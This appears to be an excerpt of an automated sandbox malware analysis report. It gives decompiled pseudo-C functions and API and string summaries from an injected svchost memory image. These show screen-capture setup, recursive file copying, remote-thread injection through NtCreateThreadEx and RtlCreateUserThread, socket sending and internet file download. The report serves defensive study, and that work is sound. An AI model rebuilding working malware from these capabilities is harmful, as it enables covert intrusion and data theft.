                                                            				_t157 =  *0xaf595008; // 0x486b4b98dc9d
                                                            				 *(_t202 + 0x180) = _t157 ^ _t202;
                                                            				_t197 = __rcx;
                                                            				 *__rcx = 0xaf589380;
                                                            				E0000022B22BAF5444A0(__eflags, __rbx, __rcx + 0xc8, _t194, __rcx);
                                                            				if (_t153 == 0) goto 0xaf5451ff;
                                                            				if (_t153 == 0) goto 0xaf5451ff;
                                                            				if (_t153 == 0) goto 0xaf5451ff;
                                                            				if (_t153 == 0) goto 0xaf5451ff;
                                                            				if (__edx - 0xfffffffffffffff2 == 0x10) goto 0xaf5451ff;
                                                            				 *((intOrPtr*)(__rcx + 0xa0)) = 0x20;
                                                            				goto 0xaf545205;
                                                            				 *((intOrPtr*)(__rcx + 0xa0)) = __edx;
                                                            				if (E0000022B22BAF548D10(_t162, __rcx, _t194) == 0) goto 0xaf54521f;
                                                            				ReleaseDC(??, ??);
                                                            				GetDesktopWindow();
                                                            				 *((long long*)(_t197 + 0x1d0)) = 0xaf589380;
                                                            				GetDC(??);
                                                            				 *((long long*)(_t197 + 0x48)) = 0xaf589380;
                                                            				 *((intOrPtr*)(_t197 + 0x14)) = 0xcc0020;
                                                            				 *((char*)(_t197 + 8)) = 2;
                                                            				 *((intOrPtr*)(_t197 + 0xc)) = 0x64;
                                                            				 *((intOrPtr*)(_t197 + 0x10)) = dil;
                                                            				GetDesktopWindow();
                                                            				__imp__MonitorFromWindow();
                                                            				 *((intOrPtr*)(_t202 + 0x30)) = 0x68;
                                                            				GetMonitorInfoW(??, ??);
                                                            				 *((intOrPtr*)(_t202 + 0xe4)) = 0xdc;
                                                            				EnumDisplaySettingsW(??, ??, ??);
                                                            				 *(_t197 + 0x28) =  *(_t202 + 0x14c);
                                                            				 *(_t197 + 0x2c) =  *(_t202 + 0x150);
                                                            				asm("cdq");
                                                            				 *((intOrPtr*)(_t197 + 0x30)) = 0;
                                                            				 *((char*)(_t197 + 0x24)) = 0x20 /  *(_t197 + 0xa0);
                                                            				CreateCompatibleDC(??);
                                                            				 *((long long*)(_t197 + 0x58)) = 0xaf589380;
                                                            				CreateCompatibleDC(??);
                                                            				 *((long long*)(_t197 + 0xb8)) = 0xaf589380;
                                                            				CreateCompatibleDC(??);
                                                            				 *((long long*)(_t197 + 0x50)) = 0xaf589380;
                                                            				CreateCompatibleDC(??);
                                                            				r8d =  *(_t197 + 0x28);
                                                            				_t38 = _t199 + 1; // 0x1
                                                            				r9d = _t38;
                                                            				 *((long long*)(_t197 + 0x60)) = 0xaf589380;
                                                            				 *(_t197 + 0x78) = _t199;
                                                            				 *(_t197 + 0x80) = _t199;
                                                            				E0000022B22BAF545740( *(_t197 + 0xa0), 0xaf589380, _t162, _t197, _t197, _t199);
                                                            				r9d =  *(_t197 + 0x2c);
                                                            				r8d =  *(_t197 + 0x28);
                                                            				 *((long long*)(_t197 + 0x88)) = 0xaf589380;
                                                            				E0000022B22BAF545740( *(_t197 + 0xa0), 0xaf589380, _t162, _t197, _t197, _t199);
                                                            				r8d =  *(_t197 + 0x28);
                                                            				_t48 = _t199 + 1; // 0x1
                                                            				r9d = _t48;
                                                            				 *((long long*)(_t197 + 0x90)) = 0xaf589380;
                                                            				E0000022B22BAF545740( *(_t197 + 0xa0), 0xaf589380, _t162, _t197, _t197, _t199);
                                                            				r8d = 0;
                                                            				 *((intOrPtr*)(_t202 + 0x28)) = 0;
                                                            				 *((long long*)(_t197 + 0x98)) = 0xaf589380;
                                                            				 *(_t202 + 0x20) = _t199;
                                                            				CreateDIBSection(??, ??, ??, ??, ??, ??);
                                                            				r8d = 0;
                                                            				 *((intOrPtr*)(_t202 + 0x28)) = 0;
                                                            				 *((long long*)(_t197 + 0x68)) = 0xaf589380;
                                                            				 *(_t202 + 0x20) = _t199;
                                                            				CreateDIBSection(??, ??, ??, ??, ??, ??);
                                                            				 *((long long*)(_t197 + 0x70)) = 0xaf589380;
                                                            				r8d = 0;
                                                            				 *((intOrPtr*)(_t202 + 0x28)) = 0;
                                                            				 *(_t202 + 0x20) = _t199;
                                                            				CreateDIBSection(??, ??, ??, ??, ??, ??);
                                                            				 *((long long*)(_t197 + 0xc0)) = 0xaf589380;
                                                            				SelectObject(??, ??);
                                                            				SelectObject(??, ??);
                                                            				SelectObject(??, ??);
                                                            				r9d =  *(_t197 + 0x28);
                                                            				r8d = 0;
                                                            				 *(_t202 + 0x20) =  *(_t197 + 0x2c);
                                                            				SetRect(??, ??, ??, ??, ??);
                                                            				E0000022B22BAF55A828( *( *((intOrPtr*)(_t197 + 0x90)) + 0x14),  *((intOrPtr*)(_t197 + 0x90)));
                                                            				 *((long long*)(_t197 + 0x18)) = 0xaf589380;
                                                            				 *((intOrPtr*)(_t197 + 0x20)) = 0;
                                                            				 *(_t197 + 0xa4) =  *( *((intOrPtr*)(_t197 + 0x90)) + 0x14) /  *(_t197 + 0x2c);
                                                            				return E0000022B22BAF55A7C0( *((intOrPtr*)(_t197 + 0xc0)) +  *((intOrPtr*)(_t197 + 0xc0)), _t197,  *(_t202 + 0x180) ^ _t202);
                                                            			}











                                                            0x22baf545190
                                                            0x22baf545190
                                                            0x22baf545190
                                                            0x22baf545195
                                                            0x22baf54519a
                                                            0x22baf5451a0
                                                            0x22baf5451a7
                                                            0x22baf5451b1
                                                            0x22baf5451c0
                                                            0x22baf5451c3
                                                            0x22baf5451d3
                                                            0x22baf5451dd
                                                            0x22baf5451e2
                                                            0x22baf5451e7
                                                            0x22baf5451ec
                                                            0x22baf5451f1
                                                            0x22baf5451f3
                                                            0x22baf5451fd
                                                            0x22baf5451ff
                                                            0x22baf54520c
                                                            0x22baf545219
                                                            0x22baf54521f
                                                            0x22baf545228
                                                            0x22baf54522f
                                                            0x22baf545235
                                                            0x22baf545239
                                                            0x22baf545240
                                                            0x22baf545244
                                                            0x22baf54524b
                                                            0x22baf54524f
                                                            0x22baf54525d
                                                            0x22baf545268
                                                            0x22baf545273
                                                            0x22baf545281
                                                            0x22baf545296
                                                            0x22baf5452a7
                                                            0x22baf5452b1
                                                            0x22baf5452b9
                                                            0x22baf5452ba
                                                            0x22baf5452c3
                                                            0x22baf5452c6
                                                            0x22baf5452d0
                                                            0x22baf5452d4
                                                            0x22baf5452dc
                                                            0x22baf5452e3
                                                            0x22baf5452eb
                                                            0x22baf5452ef
                                                            0x22baf5452f5
                                                            0x22baf5452f9
                                                            0x22baf5452f9
                                                            0x22baf545306
                                                            0x22baf54530a
                                                            0x22baf54530e
                                                            0x22baf545315
                                                            0x22baf54531a
                                                            0x22baf545321
                                                            0x22baf54532b
                                                            0x22baf545332
                                                            0x22baf545337
                                                            0x22baf54533b
                                                            0x22baf54533b
                                                            0x22baf545348
                                                            0x22baf54534f
                                                            0x22baf545363
                                                            0x22baf545366
                                                            0x22baf54536a
                                                            0x22baf545371
                                                            0x22baf545376
                                                            0x22baf54538e
                                                            0x22baf545391
                                                            0x22baf545395
                                                            0x22baf545399
                                                            0x22baf54539e
                                                            0x22baf5453a4
                                                            0x22baf5453b6
                                                            0x22baf5453bd
                                                            0x22baf5453c1
                                                            0x22baf5453c6
                                                            0x22baf5453d4
                                                            0x22baf5453db
                                                            0x22baf5453e9
                                                            0x22baf5453fd
                                                            0x22baf54540a
                                                            0x22baf54540e
                                                            0x22baf545413
                                                            0x22baf545417
                                                            0x22baf54542a
                                                            0x22baf54542f
                                                            0x22baf545442
                                                            0x22baf545445
                                                            0x22baf545476

                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.792689473.0000022BAF530000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000022BAF530000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_22baf530000_svchost.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Create$Compatible$ObjectSectionSelectWindow$DesktopMonitor$CursorDisplayEnumFromInfoLoadRectReleaseSettings
                                                            • String ID: h
                                                            • API String ID: 4226666810-2439710439
                                                            • Opcode ID: 6afb788c6d877dd801437169d4e9bc8d2bcc631692589c2de25a78b587554336
                                                            • Instruction ID: 487fac339fb10991d7dc2a6279364a8e4a0f9971c3c612eb87de43d982bce0e1
                                                            • Opcode Fuzzy Hash: 6afb788c6d877dd801437169d4e9bc8d2bcc631692589c2de25a78b587554336
                                                            • Instruction Fuzzy Hash: 55810377600B84ABEB75DF66F44878AB7A1F749B94F404116DB9A03B6ACF39E045CB00
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.792689473.0000022BAF530000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000022BAF530000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_22baf530000_svchost.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: AddressLibraryLoadProc$CloseHandleProcessVirtual$AllocCreateFreeMemoryObjectOpenRemoteSingleThreadVersionWaitWrite
                                                            • String ID: @$NtCreateThreadEx$RtlAdjustPrivilege$RtlCreateUserThread$ntdll.dll
                                                            • API String ID: 1281333451-61639166
                                                            • Opcode ID: d1eb00ed172a1201c92b193bb75822132a94aa4826c82e80ec1090534ef58fb6
                                                            • Instruction ID: b56d4a13229e99aeb99226d1b050ec4fa5341635bcc8c494315311515f8d6d6c
                                                            • Opcode Fuzzy Hash: d1eb00ed172a1201c92b193bb75822132a94aa4826c82e80ec1090534ef58fb6
                                                            • Instruction Fuzzy Hash: DC518333604B40A6EB769F56F84C39A73A1FB89B91F484524DE8D43B5ADF39C5458700
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.792689473.0000022BAF530000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000022BAF530000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_22baf530000_svchost.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: ErrorLast$CurrentThread$EventSelectTimerWaitableconnectsend$CloseCreateEventsHandleMultipleWait
                                                            • String ID:
                                                            • API String ID: 1791436937-0
                                                            • Opcode ID: c55a559a95b8471c2ba4b96d2488654afb3e37b857d3c8f78ac58debbc8c17bc
                                                            • Instruction ID: 0ae2e573eeb4016e27d0b4152b1cdb00bd929aef62575682ddfd7818951aaa77
                                                            • Opcode Fuzzy Hash: c55a559a95b8471c2ba4b96d2488654afb3e37b857d3c8f78ac58debbc8c17bc
                                                            • Instruction Fuzzy Hash: 1AE1B033600A40A6EB768FBAD85C39D37A0FB48B94F154625DE1A877DADF3AC845C740
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.792689473.0000022BAF530000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000022BAF530000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_22baf530000_svchost.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Service$CloseHandleLocal$Free$AllocEnumOpenServicesStatus$ConfigManagerQuery
                                                            • String ID: -k netsvcs
                                                            • API String ID: 2067902596-1604415765
                                                            • Opcode ID: 2288ee3aaf89ef1cf841c30b8f1e5c1043746bc526fc9fc93235c2acc9007efd
                                                            • Instruction ID: c522a37b900c8b15536ea159a955bf601600d2d14cf3ca7401fa9fd4dc7c2471
                                                            • Opcode Fuzzy Hash: 2288ee3aaf89ef1cf841c30b8f1e5c1043746bc526fc9fc93235c2acc9007efd
                                                            • Instruction Fuzzy Hash: 74719C37619B80A6EB768B96F84C39AB7E5F788B81F0445159E8A43B59DF3EC405CB00
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 36%
                                                            			E0000022B22BAF54AE20(long long __rbx, void* __rcx, void* __rdx) {
                                                            				void* __rdi;
                                                            				void* _t54;
                                                            				void* _t60;
                                                            				void* _t61;
                                                            				signed long long _t72;
                                                            				signed long long _t73;
                                                            				void* _t114;
                                                            				void* _t117;
                                                            				signed long long _t118;
                                                            				void* _t120;
                                                            
                                                            				_t116 = _t117 - 0x7b0;
                                                            				_t118 = _t117 - 0x8b0;
                                                            				_t72 =  *0xaf595008; // 0x486b4b98dc9d
                                                            				_t73 = _t72 ^ _t118;
                                                            				 *(_t117 - 0x7b0 + 0x7a0) = _t73;
                                                            				_t114 = __rcx;
                                                            				r8d = 0x208;
                                                            				E0000022B22BAF563830(_t54, 0, _t60, _t61, _t117 - 0x7b0 + 0x590, __rdx, __rcx, _t120);
                                                            				lstrcpyW(??, ??);
                                                            				lstrcatW(??, ??);
                                                            				if (CreateDirectoryW(??, ??) != 0) goto 0xaf54aea2;
                                                            				if (GetLastError() != 0xb7) goto 0xaf54b001;
                                                            				 *((long long*)(_t118 + 0x8e0)) = __rbx;
                                                            				FindFirstFileW(??, ??);
                                                            				if (_t73 == 0xffffffff) goto 0xaf54aff9;
                                                            				r8d = 0x208;
                                                            				E0000022B22BAF563830(_t54, 0, _t60, _t61, _t116 + 0x380, _t118 + 0x20, _t114, _t120);
                                                            				lstrcpyW(??, ??);
                                                            				lstrcatW(??, ??);
                                                            				lstrcatW(??, ??);
                                                            				r8d = 0x208;
                                                            				E0000022B22BAF563830(_t54, 0, _t60, _t61, _t116 + 0x170, _t118 + 0x4c, _t114, _t120);
                                                            				lstrcpyW(??, ??);
                                                            				lstrcatW(??, ??);
                                                            				lstrcatW(??, ??);
                                                            				if (( *(_t118 + 0x20) & 0x00000010) == 0) goto 0xaf54afcc;
                                                            				if (lstrcmpW(??, ??) == 0) goto 0xaf54afcc;
                                                            				if (lstrcmpW(??, ??) == 0) goto 0xaf54afcc;
                                                            				if (CreateDirectoryW(??, ??) != 0) goto 0xaf54afb7;
                                                            				if (GetLastError() != 0xb7) goto 0xaf54afe3;
                                                            				E0000022B22BAF54AE20(_t73, _t116 + 0x380, _t116 + 0x170);
                                                            				goto 0xaf54afe3;
                                                            				r8d = 0;
                                                            				CopyFileW(??, ??, ??);
                                                            				if (FindNextFileW(??, ??) != 0) goto 0xaf54aed0;
                                                            				return E0000022B22BAF55A7C0(_t54, _t73,  *(_t116 + 0x7a0) ^ _t118);
                                                            			}













                                                            0x22baf54ae24
                                                            0x22baf54ae2c
                                                            0x22baf54ae33
                                                            0x22baf54ae3a
                                                            0x22baf54ae3d
                                                            0x22baf54ae47
                                                            0x22baf54ae53
                                                            0x22baf54ae59
                                                            0x22baf54ae68
                                                            0x22baf54ae7c
                                                            0x22baf54ae8f
                                                            0x22baf54ae9c
                                                            0x22baf54aea7
                                                            0x22baf54aeb6
                                                            0x22baf54aec3
                                                            0x22baf54aed9
                                                            0x22baf54aedf
                                                            0x22baf54aeee
                                                            0x22baf54af02
                                                            0x22baf54af14
                                                            0x22baf54af23
                                                            0x22baf54af29
                                                            0x22baf54af38
                                                            0x22baf54af4c
                                                            0x22baf54af5e
                                                            0x22baf54af69
                                                            0x22baf54af7f
                                                            0x22baf54af95
                                                            0x22baf54afa8
                                                            0x22baf54afb5
                                                            0x22baf54afc5
                                                            0x22baf54afca
                                                            0x22baf54afcc
                                                            0x22baf54afdd
                                                            0x22baf54aff3
                                                            0x22baf54b01a

                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.792689473.0000022BAF530000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000022BAF530000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_22baf530000_svchost.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: lstrcat$Filelstrcpy$CreateDirectoryErrorFindLastlstrcmp$CopyFirstNext
                                                            • String ID:
                                                            • API String ID: 2173410017-0
                                                            • Opcode ID: 5be340f3481fc6aa81c52eaaf9161cdb88cbfe3b0d8b9c89914eade7bfd48419
                                                            • Instruction ID: a0b15b0343baa5a6c7080cef3b37d3b68eed44370783d0c94e58a158c1f99a9e
                                                            • Opcode Fuzzy Hash: 5be340f3481fc6aa81c52eaaf9161cdb88cbfe3b0d8b9c89914eade7bfd48419
                                                            • Instruction Fuzzy Hash: 1B518F23210A86B5EF729FA1EC5C3DA3362F784B89F844511D51E865EAEF3AC249C740
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.792689473.0000022BAF530000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000022BAF530000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_22baf530000_svchost.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Desktop$Create$MonitorWindow$AddressCompatibleDisplayEnumEventFromInfoLibraryLoadOpenProcSettingsThreadVersion
                                                            • String ID: ($default2$h
                                                            • API String ID: 795108055-3490582903
                                                            • Opcode ID: 5386fe677adde34bc2a11b830201e9cca433c16bbe72ce2ba442d2155dbd97b5
                                                            • Instruction ID: 0b346cc2e5e47389b111cd58f75a6fb258511648225754a833d5d5effc237a82
                                                            • Opcode Fuzzy Hash: 5386fe677adde34bc2a11b830201e9cca433c16bbe72ce2ba442d2155dbd97b5
                                                            • Instruction Fuzzy Hash: E3719B33601B809AEB65DF74E84839D73E4F788B88F008229DA8D8775AEF39C455CB40
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 50%
                                                            			E0000022B22BAF534B90(long long __rcx, long long __rdx, long long __r8) {
                                                            				void* __rbx;
                                                            				void* __rdi;
                                                            				void* __rsi;
                                                            				signed int _t79;
                                                            				void* _t103;
                                                            				signed int _t105;
                                                            				signed int _t106;
                                                            				signed int _t109;
                                                            				void* _t125;
                                                            				void* _t128;
                                                            				void* _t130;
                                                            				void* _t131;
                                                            				void* _t132;
                                                            				void* _t133;
                                                            				void* _t134;
                                                            				signed long long _t149;
                                                            				signed long long _t150;
                                                            				void* _t151;
                                                            				signed short* _t152;
                                                            				signed long long _t153;
                                                            				signed long long _t158;
                                                            				void* _t188;
                                                            				void* _t189;
                                                            				void* _t190;
                                                            				signed long long _t191;
                                                            				void* _t203;
                                                            				void* _t204;
                                                            
                                                            				_t189 = _t190 - 0xdf8;
                                                            				_t191 = _t190 - 0xef8;
                                                            				_t149 =  *0xaf595008; // 0x486b4b98dc9d
                                                            				_t150 = _t149 ^ _t191;
                                                            				 *(_t189 + 0xde0) = _t150;
                                                            				 *((long long*)(_t191 + 0x48)) = __rdx;
                                                            				 *((long long*)(_t191 + 0x50)) = __rcx;
                                                            				 *((intOrPtr*)(_t191 + 0x30)) = r9d;
                                                            				 *((long long*)(_t191 + 0x40)) = __r8;
                                                            				LocalAlloc(??, ??);
                                                            				 *(_t191 + 0x38) = _t150;
                                                            				wsprintfW(??, ??);
                                                            				FindFirstFileW(??, ??);
                                                            				 *(_t191 + 0x58) = _t150;
                                                            				if (_t150 == 0xffffffff) goto 0xaf534e5a;
                                                            				 *_t150 = 0x74;
                                                            				asm("o16 nop [eax+eax]");
                                                            				_t105 =  *(_t189 - 0x74) & 0x0000ffff;
                                                            				_t130 = _t105 - "."; // 0x2e
                                                            				_t79 =  *(_t189 - 0x72) & 0x0000ffff;
                                                            				if (_t130 != 0) goto 0xaf534c4e;
                                                            				_t131 = _t79 -  *0xaf587872; // 0x0
                                                            				if (_t131 == 0) goto 0xaf534e12;
                                                            				_t132 = _t105 - L".."; // 0x2e
                                                            				if (_t132 != 0) goto 0xaf534c71;
                                                            				_t133 = _t79 -  *0xaf587876; // 0x2e
                                                            				if (_t133 != 0) goto 0xaf534c71;
                                                            				_t134 = ( *(_t189 - 0x70) & 0x0000ffff) -  *0xaf587878; // 0x0
                                                            				if (_t134 == 0) goto 0xaf534e12;
                                                            				_t106 =  *(_t189 + _t150 - 0x74) & 0x0000ffff;
                                                            				 *(_t189 + _t150 + 0x5c0) = _t106;
                                                            				_t151 = _t150 + 2;
                                                            				if (_t106 != 0) goto 0xaf534c73;
                                                            				if ( *((intOrPtr*)(_t191 + 0x30)) == 0) goto 0xaf534c9c;
                                                            				E0000022B22BAF5646B0(0x2800, _t151, _t189 + 0x5c0, _t191 + 0x60);
                                                            				if ( *((intOrPtr*)(_t189 + 0xe40)) != 0) goto 0xaf534cb0;
                                                            				if (( *(_t191 + 0x60) & 0x00000010) != 0) goto 0xaf534db2;
                                                            				if ( *((intOrPtr*)(_t189 + 0xe48)) == 0) goto 0xaf534cd4;
                                                            				E0000022B22BAF563014(_t150, _t189 + 0x5c0,  *((intOrPtr*)(_t191 + 0x40)), _t188, _t203, _t204);
                                                            				goto 0xaf534cfe;
                                                            				_t152 = _t189 + 0x5c0;
                                                            				_t109 =  *(_t152 +  *((intOrPtr*)(_t191 + 0x40)) - _t152) & 0x0000ffff;
                                                            				if (_t151 != 0) goto 0xaf534cf7;
                                                            				_t153 =  &(_t152[1]);
                                                            				if (_t109 != 0) goto 0xaf534ce3;
                                                            				if ((0 | ( *_t152 & 0x0000ffff) - _t109 == 0x00000000) == 0) goto 0xaf534dab;
                                                            				_t36 = _t188 - 0x410; // 0x23f0
                                                            				if (1 - _t36 <= 0) goto 0xaf534d2f;
                                                            				r8d = 0x42;
                                                            				LocalReAlloc(??, ??, ??);
                                                            				 *(_t191 + 0x38) = _t153;
                                                            				 *(_t153 + _t153) =  *(_t191 + 0x60) & 0x10;
                                                            				wsprintfW(??, ??);
                                                            				lstrlenW(??);
                                                            				_t103 = 2 + _t153 * 2;
                                                            				E0000022B22BAF562BA0(2, 2, 0x2c10, _t128, _t189 + 0x1b0 +  *(_t191 + 0x38), _t189 + 0x1b0, __rdx, _t188, _t103);
                                                            				_t158 =  *(_t191 + 0x38);
                                                            				 *((intOrPtr*)(__rdx + _t158)) =  *((intOrPtr*)(_t191 + 0x7c));
                                                            				 *((intOrPtr*)(__rdx + _t158)) =  *((intOrPtr*)(_t189 - 0x80));
                                                            				 *((long long*)(__rdx + _t158)) =  *((intOrPtr*)(_t191 + 0x74));
                                                            				_t125 = 2 + _t103 + 0x10;
                                                            				if (( *(_t191 + 0x60) & 0x00000010) == 0) goto 0xaf534e12;
                                                            				r8d = 0x410;
                                                            				E0000022B22BAF563830(2, 0, _t125, _t128, _t189 + 0x1b0, _t189 + 0x1b0, __rdx, _t103);
                                                            				wsprintfW(??, ??);
                                                            				r9d =  *((intOrPtr*)(_t191 + 0x30));
                                                            				 *((intOrPtr*)(_t191 + 0x28)) =  *((intOrPtr*)(_t189 + 0xe48));
                                                            				 *((intOrPtr*)(_t191 + 0x20)) =  *((intOrPtr*)(_t189 + 0xe40));
                                                            				E0000022B22BAF534B90( *((intOrPtr*)(_t191 + 0x50)), _t189 + 0x1b0,  *((intOrPtr*)(_t191 + 0x40)));
                                                            				if (FindNextFileW(??, ??) != 0) goto 0xaf534c30;
                                                            				if (_t125 - 1 <= 0) goto 0xaf534e46;
                                                            				r9b = 0x3f;
                                                            				r8d = _t125;
                                                            				E0000022B22BAF531FF0( *((intOrPtr*)( *((intOrPtr*)(_t191 + 0x50)) + 8)), _t158);
                                                            				LocalFree(??);
                                                            				FindClose(??);
                                                            				return E0000022B22BAF55A7C0(2,  *((intOrPtr*)(_t191 + 0x50)),  *(_t189 + 0xde0) ^ _t191);
                                                            			}






























                                                            0x22baf534b95
                                                            0x22baf534b9d
                                                            0x22baf534ba4
                                                            0x22baf534bab
                                                            0x22baf534bae
                                                            0x22baf534bb8
                                                            0x22baf534bbd
                                                            0x22baf534bc9
                                                            0x22baf534bd3
                                                            0x22baf534bd8
                                                            0x22baf534bef
                                                            0x22baf534bf7
                                                            0x22baf534c09
                                                            0x22baf534c0f
                                                            0x22baf534c18
                                                            0x22baf534c1e
                                                            0x22baf534c26
                                                            0x22baf534c30
                                                            0x22baf534c34
                                                            0x22baf534c3b
                                                            0x22baf534c3f
                                                            0x22baf534c41
                                                            0x22baf534c48
                                                            0x22baf534c4e
                                                            0x22baf534c55
                                                            0x22baf534c57
                                                            0x22baf534c5e
                                                            0x22baf534c64
                                                            0x22baf534c6b
                                                            0x22baf534c73
                                                            0x22baf534c78
                                                            0x22baf534c80
                                                            0x22baf534c87
                                                            0x22baf534c8e
                                                            0x22baf534c97
                                                            0x22baf534ca3
                                                            0x22baf534caa
                                                            0x22baf534cb7
                                                            0x22baf534cc5
                                                            0x22baf534cd2
                                                            0x22baf534cd9
                                                            0x22baf534ce6
                                                            0x22baf534ced
                                                            0x22baf534cef
                                                            0x22baf534cf5
                                                            0x22baf534d00
                                                            0x22baf534d06
                                                            0x22baf534d0e
                                                            0x22baf534d16
                                                            0x22baf534d21
                                                            0x22baf534d2a
                                                            0x22baf534d4b
                                                            0x22baf534d55
                                                            0x22baf534d62
                                                            0x22baf534d76
                                                            0x22baf534d80
                                                            0x22baf534d8b
                                                            0x22baf534d90
                                                            0x22baf534d99
                                                            0x22baf534da4
                                                            0x22baf534da8
                                                            0x22baf534db0
                                                            0x22baf534dbb
                                                            0x22baf534dc1
                                                            0x22baf534ddd
                                                            0x22baf534df0
                                                            0x22baf534dff
                                                            0x22baf534e09
                                                            0x22baf534e0d
                                                            0x22baf534e24
                                                            0x22baf534e2d
                                                            0x22baf534e34
                                                            0x22baf534e37
                                                            0x22baf534e41
                                                            0x22baf534e49
                                                            0x22baf534e54
                                                            0x22baf534e76

                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.792689473.0000022BAF530000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000022BAF530000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_22baf530000_svchost.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: FindLocalwsprintf$AllocFile$CloseFirstFreeNextlstrlen
                                                            • String ID: %s\%s$%s\*.*
                                                            • API String ID: 2721355277-1665845743
                                                            • Opcode ID: abdd5a9681e2640ee9af39248f253918e973dcbd9db37a78171373676a17d401
                                                            • Instruction ID: c0661c0a475e20ef63bdfe2f367a3b31b8179bd8e259c3ee45670ed74377fe6b
                                                            • Opcode Fuzzy Hash: abdd5a9681e2640ee9af39248f253918e973dcbd9db37a78171373676a17d401
                                                            • Instruction Fuzzy Hash: 8A81A333200689A6EB719FA9E85C3EE77E0F784798F440126DB49477AADF79C545CB00
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.792689473.0000022BAF530000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000022BAF530000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_22baf530000_svchost.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: FindLocal$AllocFile$CloseFirstFreeNextlstrlenwsprintf
                                                            • String ID: %s\*.*$i
                                                            • API String ID: 4084865168-1236837797
                                                            • Opcode ID: 463ae89ab22ca705f386465367e7666356ca74fd6d6a71fc1569614ef2665c13
                                                            • Instruction ID: 7692f92c023837b4a0822229f1c6581f91c2d617bc00e1b4f32d7f42b3ee567b
                                                            • Opcode Fuzzy Hash: 463ae89ab22ca705f386465367e7666356ca74fd6d6a71fc1569614ef2665c13
                                                            • Instruction Fuzzy Hash: 2951F473200781A6EB329F99E85C3EA77A1F384B94F804510DE9A4779ADF3EC445CB40
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.792689473.0000022BAF530000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000022BAF530000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_22baf530000_svchost.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Internet$CloseHandle$File$Open$CreateReadWrite
                                                            • String ID: Mozilla/4.0 (compatible)
                                                            • API String ID: 769820311-4055971283
                                                            • Opcode ID: be5a5e1b368cc5108e419e1b9e5fb4be1e551196d225a5f4fd0239b7728a2713
                                                            • Instruction ID: 389b604937b1887fb42a07c63bf41c3b50811f2e00e3e35f62f461835f37e0f3
                                                            • Opcode Fuzzy Hash: be5a5e1b368cc5108e419e1b9e5fb4be1e551196d225a5f4fd0239b7728a2713
                                                            • Instruction Fuzzy Hash: 9F419D73204680A6EB319B91A41DB9AB7A1F789BA9F444515DF9A03F9ADF3EC045CB00
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.792689473.0000022BAF530000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000022BAF530000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_22baf530000_svchost.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Find$Filewsprintf$CloseDirectoryFirstNextRemove
                                                            • String ID: %s\%s$%s\*.*
                                                            • API String ID: 2470771279-1665845743
                                                            • Opcode ID: f3d3e9b9d549876d5093af9cb419338495f1e6fd6df94ca7809052bbf74254e8
                                                            • Instruction ID: 4bc2b7b4b08819a37e888ac2d3eb2991a9c7dabe718fda27b99fd8bc5f23c7bc
                                                            • Opcode Fuzzy Hash: f3d3e9b9d549876d5093af9cb419338495f1e6fd6df94ca7809052bbf74254e8
                                                            • Instruction Fuzzy Hash: A931C62320464AF1EE329FA5F45C3EAB7A0F745BD0F915211DA9A0369ADF3EC545CB40
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 37%
